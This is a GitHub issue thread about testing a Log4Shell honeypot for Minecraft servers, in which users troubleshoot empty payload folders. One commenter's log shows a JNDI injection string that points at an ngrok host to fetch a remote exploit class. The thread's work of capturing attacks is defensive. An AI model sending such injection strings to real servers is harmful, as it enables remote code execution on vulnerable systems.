Testing example

Question

Testing example

Nenodema opened this issue 3 years ago · 7 comments

Nice honeypot! Could you please provide a script in order to test this? I have seen multiple attacks on my honeypot but "Payloads" stays empty.

Answer 1 · 2021-12-19T18:06:28.000Z

I've been having the same issue as well. Not sure what is wrong. Maybe the payloads folder location.
Adikso, Where should the payloads folder be created with the Docker version?

Getting connections, but when I look into the payloads folder it is blank.

Thanks,

Answer 2 · 2021-12-20T04:34:11.000Z

What do you mean by "attacks"? Are there "${jndi:ldap://XXXX} messages showing up in console output?
All players messages and their nicknames are analysed and printed in the output

Answer 3 · 2021-12-21T19:20:54.000Z

Here is what I'm seeing for output:

2021/12/13 18:49:37 Waiting for connections on :25565
2021/12/14 06:37:19 New connection from XXX.XXX.XXX.XXX:19369
2021/12/14 06:37:19 Received handshake: 384 1 XXX.XXX.XXX.XXX:25565
2021/12/14 06:38:09 New connection from XXX.XXX.XXX.XXX:1646
2021/12/14 06:38:09 Received handshake: 384 1 XXX.XXX.XXX.XXX:25565
2021/12/14 21:01:03 New connection from XXX.XXX.XXX.XXX:59336
2021/12/14 21:01:03 Received handshake: 4 1 XXX.XXX.XXX.XXX:25565
2021/12/14 21:40:39 New connection from XXX.XXX.XXX.XXX:7388
2021/12/14 21:40:39 Received handshake: 4 1 XXX.XXX.XXX.XXX:25565

So, maybe I'm doing something wrong or my setup is not correct.

Thanks,

Answer 4 · 2021-12-21T21:52:43.000Z

These are not attacks, somebody is just doing server list ping. They didn't joined the game

Answer 5 · 2021-12-22T00:19:59.000Z

Aw, ok thanks for letting me know. Can you post an attacker joining the game? Just so I have an example.

Answer 6 · 2021-12-25T17:35:58.000Z

Hey @rangerrkm,
I set up the honeypot and tested it with my own account (no success getting any attacker to join yet.) The logs for a successful attack look like this:

2021/12/16 04:30:24 New connection from xxx.xxx.xxx.xx:61768
2021/12/16 04:30:24 Received handshake: 754 2 xxx.xxx.xxx.xxx:25565
2021/12/16 04:30:24 Testing text: xxxxx
2021/12/16 04:30:24 xxxxx joined the server
2021/12/16 04:30:28 Testing text: ${jndi:ldap://2.tcp.ngrok.io:14179/Exploit}
2021/12/16 04:30:28 Fetching payload for: jndi:ldap://2.tcp.ngrok.io:14179/Exploit
2021/12/16 04:30:29 Saved payload to file 5ffa6880-42e1-4031-8016-6badde8169c8.class

afterwards you can find the payload class in the payloads folder

Answer 7 · 2021-12-26T17:55:51.000Z

Thanks @nixrod for the information.